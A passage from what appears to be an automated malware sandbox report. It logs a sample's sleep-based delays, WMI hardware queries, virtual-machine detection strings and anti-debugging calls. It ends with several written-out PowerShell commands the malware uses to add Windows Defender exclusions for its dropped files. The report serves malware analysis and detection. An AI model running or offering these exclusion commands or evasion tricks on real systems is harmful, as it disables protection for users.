                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -591172s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -590813s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -590467s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -589985s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -589563s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -589313s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -588875s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 1836Thread sleep time: -600000s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -588563s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -588063s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -587687s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -587094s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -586719s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -586260s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -585915s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -585641s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -585144s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -584933s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -584735s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -584533s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -584375s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -584183s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -583985s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -583849s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -583668s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -583516s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -583328s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -583172s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -582972s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -582735s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -582266s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -582121s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -581938s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -581781s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -581610s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -581422s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -581219s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -581000s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -580765s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -580608s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -580500s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -580391s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -580251s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -580063s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -579735s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -579516s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -579404s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -579288s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -579186s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -579074s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578922s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578750s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578625s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578512s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578406s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578297s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578182s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578074s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577968s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577846s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577719s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577606s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577489s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577360s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577172s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577031s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576922s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576809s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576703s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576594s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576469s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576324s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576216s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576109s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -575998s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -575889s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -575770s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -575641s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7072Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B2A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B2A69B
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00B3C220
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3E6A3 VirtualQuery,GetSystemInfo,0_2_00B3E6A3
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 30000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 600000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599874
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599766
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599656
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599537
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599420
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599312
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599195
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599094
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 3600000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 598906
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 598266
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 597750
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 597422
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 596891
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 596438
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 596235
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 596016
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 595828
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 595453
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 595125
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 594719
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 594375
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 594030
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 593750
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 593344
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 592985
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 592469
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 592000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 591422
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 591172
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 590813
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 590467
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 589985
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 589563
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 589313
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 588875
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 300000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 588563
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 588063
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 587687
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 587094
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 586719
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 586260
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 585915
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 585641
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 585144
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 584933
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 584735
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 584533
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 584375
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 584183
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 583985
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 583849
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 583668
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 583516
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 583328
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 583172
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 582972
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 582735
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 582266
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 582121
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 581938
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 581781
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 581610
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 581422
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 581219
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 581000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 580765
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 580608
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 580500
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 580391
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 580251
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 580063
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 579735
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 579516
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 579404
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 579288
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 579186
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 579074
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578922
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578750
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578625
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578512
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578406
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578297
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578182
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578074
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577968
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577846
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577719
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577606
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577489
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577360
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577172
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577031
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576922
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576809
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576703
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576594
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576469
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576324
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576216
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576109
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 575998
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 575889
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 575770
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 575641
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: updIMdPUj8.exe, 00000000.00000003.1678021124.0000000002DC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: wscript.exe, 00000001.00000002.1843050228.000000000290E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2C
                          Source: wscript.exe, 00000001.00000002.1843050228.000000000292C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56:
                          Source: wscript.exe, 00000001.00000002.1843050228.000000000290E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: svchost.exe, 0000001A.00000002.2927866559.000001D5A5E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2929870130.000001D5AB45A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3047089905.000000001C3B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeAPI call chain: ExitProcess graph end nodegraph_0-23682
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B3F838
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B47DEE mov eax, dword ptr fs:[00000030h]0_2_00B47DEE
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B4C030 GetProcessHeap,0_2_00B4C030
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B3F838
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3F9D5 SetUnhandledExceptionFilter,0_2_00B3F9D5
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B3FBCA
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B48EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B48EBD
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Adds a directory exclusion to Windows Defender
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe'
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe'
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\ZWgKQlTqcrSB.exe'
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\Accessories\ZWgKQlTqcrSB.exe'
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe'Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe'Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\ZWgKQlTqcrSB.exe'Jump to behavior
